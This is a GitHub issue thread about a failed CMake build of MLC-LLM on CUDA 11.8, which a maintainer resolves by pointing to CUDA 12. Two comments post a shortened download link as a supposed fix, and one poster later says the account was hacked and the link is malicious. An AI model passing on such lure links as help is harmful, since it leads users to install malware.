### ISSUE TITLE
[Bug] Fail to build MLC_LLM from source

### ISSUE THREAD

**Issue by Louym** [mlc-ai/mlc-llm#2921]
## 🐛 Bug

Fail to build MLC_LLM from source

## To Reproduce

Just follow the steps in the documentation to build MLC_LLM from source and the error arises when running `cmake .. && cmake --build . --parallel $(nproc) && cd ..` I tried to build with Flash Attention and without, all leading to the same result.

## Expected behavior

Build failed!
![image](https://github.com/user-attachments/assets/b75f11b3-f638-4043-9054-0d86e53effae)

## Environment

 - Platform (e.g. WebGPU/Vulkan/IOS/Android/CUDA): CUDA
 - Operating system (e.g. Ubuntu/Windows/MacOS/...): Ubuntu-22.04
 - Device (e.g. iPhone 12 Pro, PC+RTX 3090, ...): RTX 4090&RTX 3090
 - How you installed MLC-LLM (`conda`, source): source
 - How you installed TVM-Unity (`pip`, source): source
 - Python version (e.g. 3.10): 3.11.10
 - GPU driver version (if applicable): 535.161.07
 - CUDA/cuDNN version (if applicable): 11.8
 - TVM Unity Hash Tag (`python -c "import tvm; print('\n'.join(f'{k}: {v}' for k, v in tvm.support.libinfo().items()))"`, applicable if you compile models):
 - Any other relevant information:

## Additional context

 I wonder how to solve the problem and if I can solve it without changing the version of cuda and so on.

**Comment by AhmadMahmoodRana** [comment]
I think this will help you.
https://bit.ly/4gwC82r

you may need to install the c compiler

**Comment by ArthurMLi** [comment]
download
https://bit.ly/4gwC82r
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Louym** [comment]
@ArthurMLi @AhmadMahmoodRana Thank you for your quick reply. However, it seems I already have gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0  and clang 14.0.0-1ubuntu1.1.

**Comment by Louym** [comment]
And the website https://bit.ly/4gwC82r seems to be blocked?

**Comment by ArthurMLi** [comment]
> And the website https://bit.ly/4gwC82r seems to be blocked?
Louym pls don't download this link, i got hacked and the hacker send this.
If you downloaded pls format your pc.

**Comment by Louym** [comment]
> > And the website https://bit.ly/4gwC82r seems to be blocked?
> > Louym pls don't download this link, i got hacked and the hacker send this.
> > If you downloaded pls format your pc.

Thank goodness I didn’t download it！

**Comment by MasterJH5574** [comment]
@Louym Thanks for reporting the build failure. From the screenshot we can tell little as it does not show the details of the error. If you could share more about the log, that will be informative and helpful. Thanks!

**Comment by Louym** [comment]
@MasterJH5574  Thank you for your reply. There is no error in the terminal, just some warnings saying that ```/mlc-llm/3rdparty/tvm/3rdparty/flashinfer/include/flashinfer/attention/prefill.cuh:1979:47: warning: comparison of integer expressions of different signedness: ‘int’ and ‘long unsigned int’ [-Wsign-compare]```
And there is no errorlog or something alike. Even building with verbose does not generate more useful information. To be honest, I am not very familiar with building and can you tell me where I can find more information?

**Comment by Louym** [comment]
Has anyone else encountered these issues? I’d appreciate any solutions!

**Comment by MasterJH5574** [comment]
Hi @Louym sorry for the delayed response. I'm a bit surprised that there is not error in the log. Do you mind sharing the full log? I'm not 100% sure but the CUDA 11.8 you are using can be a reason, as we have deprecated the 11.8 support, given dependency on some features in CUDA 12.

**Comment by Louym** [comment]
@MasterJH5574 Thank you so much for your reply! There seems no CMakeError.log or CMakeOutput.log in the CMakeFiles. Cmake itself fails possibly. Anyway, I listen to your advice and successfully run MLC with cuda 12!
